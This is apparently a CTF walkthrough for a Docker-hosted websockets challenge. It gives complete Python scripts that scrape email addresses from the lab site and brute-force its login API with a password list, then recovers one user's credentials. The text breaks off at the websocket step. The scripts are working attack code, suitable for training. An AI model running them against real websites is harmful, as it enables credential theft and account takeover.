
Would you like to run this Docker container locally?
docker run -d -p 5055:3000 --name websockets --restart always joshbeck2024/ctf_websockets_challenge
For this challenge, we have a corporate website with email addresses scattered throughout it.

Here’s a script that extracts all email addresses from this series of webpages.
# Import the requests library to make HTTP requests (download web pages)
import requests
# Import re for regular expressions (used to find email patterns in text)
import re
# Import BeautifulSoup for parsing and navigating HTML content
from bs4 import BeautifulSoup
# Import urljoin to safely build full URLs from relative links
from urllib.parse import urljoin
def extract_emails(text):
"""
This function takes a block of text and extracts any email addresses
found inside it using a regular expression.
"""
# Regular expression pattern that matches most email addresses
email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}'
# re.findall() returns all matches found in the text
# set() removes duplicate email addresses
return set(re.findall(email_pattern, text))
def scrape_emails():
"""
This function visits a website, extracts emails from the main page,
then follows links on that page and extracts emails from those pages too.
"""
# The starting page we want to scrape
base_url = "<http://sem2ctf.icsi.cyber:5055/index.html>"
# Keep track of URLs we have already visited to avoid repeats
visited_urls = set()
# Store all discovered email addresses (unique values only)
found_emails = set()
# Create a session object for efficiency (reuses connections)
session = requests.Session()
print(f"I: Visiting main page: {base_url}")
try:
# Request the main page
response = session.get(base_url, timeout=5)
# Raise an exception if the request failed (404, 500, etc.)
response.raise_for_status()
# Parse the HTML content using BeautifulSoup
soup = BeautifulSoup(response.text, 'html.parser')
# Extract emails from all visible text on the main page
found_emails.update(extract_emails(soup.get_text()))
# List to store links found on the page
links = []
# Find all anchor (<a>) tags that contain an href attribute
for a_tag in soup.find_all('a', href=True):
href = a_tag['href']
# Convert relative URLs into full absolute URLs
full_url = urljoin(base_url, href)
# Only follow valid HTTP links and avoid duplicates
# This also skips things like mailto: or javascript: links
if full_url.startswith('http') and full_url not in visited_urls:
links.append(full_url)
visited_urls.add(full_url)
# Visit each discovered link once (one level deep)
for link in links:
# Avoid re-visiting the main page
if link == base_url:
continue
print(f"I: Visiting link: {link}")
try:
# Request the linked page
link_response = session.get(link, timeout=5)
# Only process the page if the request was successful
if link_response.status_code == 200:
link_soup = BeautifulSoup(link_response.text, 'html.parser')
# Extract emails from this page's text
found_emails.update(extract_emails(link_soup.get_text()))
except Exception as e:
# If a link fails (404, timeout, etc.), continue safely
print(f"E: Failed to visit {link}: {e}")
except Exception as e:
# If the main page fails, stop the program
print(f"C: Critical error accessing main page: {e}")
return
# Write all found email addresses to a file
with open('email.txt', 'w') as f:
for email in sorted(found_emails):
f.write(email + '\\n')
print(f"S: Scraped {len(found_emails)} unique emails. Saved to email.txt")
# This ensures the script only runs when executed directly,
# not when imported as a module
if __name__ == "__main__":
scrape_emails()
A password list is provided on the front page to speed things up:
Rockyou.txt will work here, but it’s going to take a while!

If we intercept a single manual login attempt using Burp Suite, we’ll see:


Because we now have our email.txt and pass.txt files, we can put together a textbook brute force:
# Import requests to send HTTP requests (used to talk to the API)
import requests
# Import sys (not used here, but commonly included for exiting or arguments)
import sys
def brute_force():
"""
This function attempts to brute-force login credentials against
a web API by trying combinations of usernames and passwords.
"""
# The API endpoint we are attacking
target_url = "<http://sem2ctf.icsi.cyber:5055/api/login>"
# Load usernames (emails) from email.txt
try:
with open('email.txt', 'r') as f:
# Read each line, remove whitespace, and ignore empty lines
usernames = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
# Stop if the file does not exist
print("E: email.txt not found.")
return
# Load passwords from pass.txt
try:
with open('pass.txt', 'r') as f:
# Read each line, remove whitespace, and ignore empty lines
passwords = [line.strip() for line in f if line.strip()]
except FileNotFoundError:
# Stop if the file does not exist
print("E: pass.txt not found.")
return
# Print basic info so the user knows what is happening
print(f"I: Loaded {len(usernames)} usernames and {len(passwords)} passwords.")
print(f"I: Target URL: {target_url}")
# Create a session object to reuse the same connection (more efficient)
session = requests.Session()
# Loop through every username
for username in usernames:
# Loop through every password
for password in passwords:
# Optional debug output (commented out to reduce noise)
# print(f"Trying {username}:{password}...", end='\\r')
# Build the JSON payload sent to the API
json_data = {
'username': username,
'password': password
}
try:
# Send a POST request with JSON data
response = session.post(
target_url,
json=json_data,
timeout=5
)
# Check for possible success
# Many APIs return HTTP 200 on successful login
if response.status_code == 200:
try:
# Try to parse the response as JSON
resp_json = response.json()
# Look for common success indicators
# - success flag
# - token value
# - the word "success" in the response
if (
resp_json.get('success') or
resp_json.get('token') or
'success' in response.text.lower()
):
print(f"\\n[+] SUCCESS Found credentials: {username}:{password}")
print(f"Response: {response.text}")
return
except:
# If the response is not valid JSON,
# we fall back to checking the raw text
pass
# Fallback check in case JSON parsing failed
if "success" in response.text.lower():
print(f"\\n[+] SUCCESS Found credentials: {username}:{password}")
return
except requests.RequestException as e:
# If the request fails (timeout, connection error, etc.),
# skip this attempt and continue
# print(f"\\nE: Request failed for {username}:{password} - {e}")
continue
# If all combinations are tried with no success
print("\\n[-] Finished brute force. No credentials found.")
# This ensures the function only runs if the script is executed directly
if __name__ == "__main__":
brute_force()
This will kick out john@socketcorp.local’s credentials.

Now let’s intercept a login using these credentials in Burp Suite.
- You’ll find 3 websocket communications this time.
